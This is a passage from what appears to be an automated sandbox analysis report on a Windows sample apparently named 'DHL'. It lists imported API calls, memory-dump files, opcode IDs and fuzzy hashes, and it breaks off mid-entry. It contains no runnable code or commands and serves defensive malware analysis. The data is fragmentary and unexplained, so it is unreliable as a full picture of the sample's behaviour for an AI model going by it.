                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                        • String ID:
                                                        • API String ID: 826366716-0
                                                        • Opcode ID: 477961d300ebf94671f54e48a677d2a8253489f71a4f2db07ec9f79447ef73a8
                                                        • Instruction ID: 02468d23e0631e4ad80399b62ea10993c6ef03e167bae3f5d4fb519867d20b2d
                                                        • Opcode Fuzzy Hash: 477961d300ebf94671f54e48a677d2a8253489f71a4f2db07ec9f79447ef73a8
                                                        • Instruction Fuzzy Hash: C661B031218241AFC314DF18D890F2ABBE5FF85358F14856CF4998B2A2DB31ED45CBA2
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A08BCD
                                                        • VariantClear.OLEAUT32 ref: 00A08C3E
                                                        • VariantClear.OLEAUT32 ref: 00A08C9D
                                                        • VariantClear.OLEAUT32(?), ref: 00A08D10
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A08D3B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType
                                                        • String ID:
                                                        • API String ID: 4136290138-0
                                                        • Opcode ID: 3d99dca6cb536c1d2559a1f7318ccb2e6cbf16a488f8d29105093d6de69d25c9
                                                        • Instruction ID: bc8b8b1ee6dc0a81d935bb5af1dea377d8cbc8c2825695122068d89d4cc89a5e
                                                        • Opcode Fuzzy Hash: 3d99dca6cb536c1d2559a1f7318ccb2e6cbf16a488f8d29105093d6de69d25c9
                                                        • Instruction Fuzzy Hash: B9517AB5A00219EFCB10CF68D884AAAB7F8FF89310B158559F949EB350E734E911CF94
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A18BAE
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A18BDA
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A18C32
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A18C57
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A18C5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        • Opcode ID: a6807542a46bfa8f4dcb8be73aeed21c5347ca886770df8be29140aaeb8f81e0
                                                        • Instruction ID: 3716bd07ce94a92caf4c1e900b82ab7205d093eaf838dc2ec0c1ff74e3a6b746
                                                        • Opcode Fuzzy Hash: a6807542a46bfa8f4dcb8be73aeed21c5347ca886770df8be29140aaeb8f81e0
                                                        • Instruction Fuzzy Hash: BE511C35A002159FCB15DFA4C881AAEBBF5FF89314F088458F849AB362DB35ED51CB90
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A28F40
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A28FD0
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A28FEC
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A29032
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A29052
                                                          • Part of subcall function 009BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A11043,?,7735E610), ref: 009BF6E6
                                                          • Part of subcall function 009BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009FFA64,00000000,00000000,?,?,00A11043,?,7735E610,?,009FFA64), ref: 009BF70D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                        • String ID:
                                                        • API String ID: 666041331-0
                                                        • Opcode ID: f9d2d25ac51191fa5ca8e617cb6cfb031f4e72d99ada6b54d643fef9837802ae
                                                        • Instruction ID: 296018dbac08f9adf5fb89feba92804ab4c72a35f5f72bdaeb513f9c58bdc96c
                                                        • Opcode Fuzzy Hash: f9d2d25ac51191fa5ca8e617cb6cfb031f4e72d99ada6b54d643fef9837802ae
                                                        • Instruction Fuzzy Hash: BA512935605215DFC711DF58C4949ADBBB1FF49324F0880A9F806AB362DB31ED86CB90
                                                        APIs
                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A36C33
                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00A36C4A
                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A36C73
                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A1AB79,00000000,00000000), ref: 00A36C98
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A36CC7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MessageSendShow
                                                        • String ID:
                                                        • API String ID: 3688381893-0
                                                        • Opcode ID: cb0fd8745fcad937b6cb978ee8d037c3079150adabfa82e39c1454fcb0d51972
                                                        • Instruction ID: 1cf72fbf99acde49828efaaf6fff75e50d613d09de3407980a2d2e9b99d539bc
                                                        • Opcode Fuzzy Hash: cb0fd8745fcad937b6cb978ee8d037c3079150adabfa82e39c1454fcb0d51972
                                                        • Instruction Fuzzy Hash: 0541E435A04104BFDB24CF68CC59FA9BBB5EB09360F149228F999E72E0C371ED42CA50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 9d6feb60c1d9681bf2e820a99847a5344687fa928655ffaa27029c208e194bcd
                                                        • Instruction ID: e27ab9f3e76eb37eb323022ee6e2fbcfc3a3e3ec678da819557e83f808b5f12c
                                                        • Opcode Fuzzy Hash: 9d6feb60c1d9681bf2e820a99847a5344687fa928655ffaa27029c208e194bcd
                                                        • Instruction Fuzzy Hash: 9541C432A40200AFCB24DFB8C981A6DB7F5EF99324F1585AAE515EB351D731ED01DB80
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 009B9141
                                                        • ScreenToClient.USER32(00000000,?), ref: 009B915E
                                                        • GetAsyncKeyState.USER32(00000001), ref: 009B9183
                                                        • GetAsyncKeyState.USER32(00000002), ref: 009B919D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 20b0b3287ad0f7d62fa63d9a54eb225f64e77cff0e35f780b9d0b226472ce5c6
                                                        • Instruction ID: d90b7244e311dda204e56af0c3323875b425efdbce23e8bc33dcedba1e8fe216
                                                        • Opcode Fuzzy Hash: 20b0b3287ad0f7d62fa63d9a54eb225f64e77cff0e35f780b9d0b226472ce5c6
                                                        • Instruction Fuzzy Hash: D3416C31A0C60ABBDF059FA8C948BFEB774FF05330F208219E529A6290C7346954DB91
                                                        APIs
                                                        • GetInputState.USER32 ref: 00A138CB
                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A13922
                                                        • TranslateMessage.USER32(?), ref: 00A1394B
                                                        • DispatchMessageW.USER32(?), ref: 00A13955
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A13966
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                        • String ID:
                                                        • API String ID: 2256411358-0
                                                        • Opcode ID: f36c166bc1f69505e5c5bfc333808c4405b4738e279413bca5731b4435357461
                                                        • Instruction ID: 322ae33e50c485b5a5b62fa6e72b60abaa7e2edf3384dfd3214e44a7a0e73c14
                                                        • Opcode Fuzzy Hash: f36c166bc1f69505e5c5bfc333808c4405b4738e279413bca5731b4435357461
                                                        • Instruction Fuzzy Hash: E531D5729043419EEF35CFB49C69FF63BE8EB05310F044569E466961A0E3F4AAC6CB11
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A1C21E,00000000), ref: 00A1CF38
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00A1CF6F
                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00A1C21E,00000000), ref: 00A1CFB4
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A1C21E,00000000), ref: 00A1CFC8
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A1C21E,00000000), ref: 00A1CFF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 3191363074-0
                                                        • Opcode ID: 58b90c5182753062268fc85a4240749dfc0e91093a64cf09e4f4e051d0be4037
                                                        • Instruction ID: c3091c1dc57530dc94189c5b017145238d962f2b12dc410a388d90bd0e71a171
                                                        • Opcode Fuzzy Hash: 58b90c5182753062268fc85a4240749dfc0e91093a64cf09e4f4e051d0be4037
                                                        • Instruction Fuzzy Hash: 8F314A71640305AFDB20DFA5CD84AEBBBF9EB54360B10442EF516E2141DB30EE82DB60
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00A01915
                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A019C1
                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00A019C9
                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A019DA
                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A019E2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 9adc3cdecb667110ccbbed4cf13d7e3ca83ee30d673534fdbed66cebc23751b2
                                                        • Instruction ID: e345f76f5983be0db274accb2f7f02bca050e48e9df500120650985f959a7c51
                                                        • Opcode Fuzzy Hash: 9adc3cdecb667110ccbbed4cf13d7e3ca83ee30d673534fdbed66cebc23751b2
                                                        • Instruction Fuzzy Hash: CE31DF72A0021DEFCB00CFA8DD99AEE3BB5EB05325F104229F921AB2D1C7709D54DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A35745
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A3579D
                                                        • _wcslen.LIBCMT ref: 00A357AF
                                                        • _wcslen.LIBCMT ref: 00A357BA
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A35816
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen
                                                        • String ID:
                                                        • API String ID: 763830540-0
                                                        • Opcode ID: 2b0c32dedf011ac362da1a07c29018bca2e5b0c3569222a8002203b4ebd4c846
                                                        • Instruction ID: c4c2c6c397a91e85f96f1225ac06d33d51ae67bae0d1b0c6dc1b186545bc2da7
                                                        • Opcode Fuzzy Hash: 2b0c32dedf011ac362da1a07c29018bca2e5b0c3569222a8002203b4ebd4c846
                                                        • Instruction Fuzzy Hash: 4F21A071D04618AADB20CFB8CC85AEE7BB9FF44720F108616F929EA180D7748A85CF50
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 009B98CC
                                                        • SetTextColor.GDI32(?,?), ref: 009B98D6
                                                        • SetBkMode.GDI32(?,00000001), ref: 009B98E9
                                                        • GetStockObject.GDI32(00000005), ref: 009B98F1
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 009B9952
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Color$LongModeObjectStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1860813098-0
                                                        • Opcode ID: 3eabbd3cffaa3a4d8679f92e4ccaad1477cc164bee57d8a6e187fc824e45efd6
                                                        • Instruction ID: c3748fc27e86d8136dac832ecf76b7297735deb3c30fbee0a31034c6e0177c91
                                                        • Opcode Fuzzy Hash: 3eabbd3cffaa3a4d8679f92e4ccaad1477cc164bee57d8a6e187fc824e45efd6
                                                        • Instruction Fuzzy Hash: F121F6321592509FCB228F75ED65AE63F64EF13330B08425DF6929B1A2C72A4982CB51
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00A20951
                                                        • GetForegroundWindow.USER32 ref: 00A20968
                                                        • GetDC.USER32(00000000), ref: 00A209A4
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00A209B0
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00A209E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 4e969d04fcef567ae4229846b9544a358398b4b58297c826cbdef7b71fd56bc1
                                                        • Instruction ID: d868ab9d11f2c7e81495611eb60bc7c91fca67740ee2d014b2d67988ddbf4940
                                                        • Opcode Fuzzy Hash: 4e969d04fcef567ae4229846b9544a358398b4b58297c826cbdef7b71fd56bc1
                                                        • Instruction Fuzzy Hash: 82218435600214AFD704EFA9DD85AAEB7F5EF45710F048068F856A7762CB30AC45CB90
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 009DCDC6
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009DCDE9
                                                          • Part of subcall function 009D3820: RtlAllocateHeap.NTDLL(00000000,?,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6,?,009A1129), ref: 009D3852
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009DCE0F
                                                        • _free.LIBCMT ref: 009DCE22
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009DCE31
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: cbdc39488c9cf2d511833548bd71277b576e8276ea8bfd154eee8d879a172cdd
                                                        • Instruction ID: dedf3e8b7b251ac8d0bf0262f649b6c3832065f666801864fc710f4778a316fb
                                                        • Opcode Fuzzy Hash: cbdc39488c9cf2d511833548bd71277b576e8276ea8bfd154eee8d879a172cdd
                                                        • Instruction Fuzzy Hash: C101D4F26412167F632156BA6C88D7BBB6DDEC6BA1315812BF905D7300EA608D02D2B0
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009B9693
                                                        • SelectObject.GDI32(?,00000000), ref: 009B96A2
                                                        • BeginPath.GDI32(?), ref: 009B96B9
                                                        • SelectObject.GDI32(?,00000000), ref: 009B96E2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 5e500a3a80cd2bf15fcf4f1afacd78f78c6e2f2c2e2429037b686b3d454f5813
                                                        • Instruction ID: 84a27ab8e1ca5ed18bd70c9b53a28ce1936d4bf72ee64990de7fba68650dad0c
                                                        • Opcode Fuzzy Hash: 5e500a3a80cd2bf15fcf4f1afacd78f78c6e2f2c2e2429037b686b3d454f5813
                                                        • Instruction Fuzzy Hash: B4218031812305EBDB11DFA8ED197E97BF8BB50335F108216F618A61B0D3705893CB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: f19ab5c7df81f99e0d631a53a44c93f17b1a2374d54259002114872e7f337662
                                                        • Instruction ID: c3346d9b32b2fcc14c6976abefe404ef03cf6ab53533c9b63b064bc3f52a32b7
                                                        • Opcode Fuzzy Hash: f19ab5c7df81f99e0d631a53a44c93f17b1a2374d54259002114872e7f337662
                                                        • Instruction Fuzzy Hash: B201B9B1E8160DBFD7185620EE42FBB735CAF61398F004824FD04AA2C2F760ED1096A5
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,009CF2DE,009D3863,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6), ref: 009D2DFD
                                                        • _free.LIBCMT ref: 009D2E32
                                                        • _free.LIBCMT ref: 009D2E59
                                                        • SetLastError.KERNEL32(00000000,009A1129), ref: 009D2E66
                                                        • SetLastError.KERNEL32(00000000,009A1129), ref: 009D2E6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 7e61073a26abceeacd4f4baa31d215965b2a855024de1bd63e7e6270a3840d63
                                                        • Instruction ID: 566f6217ab5971d05ebc98f54e4e4c214c6298b395ed52d790ad00287310a768
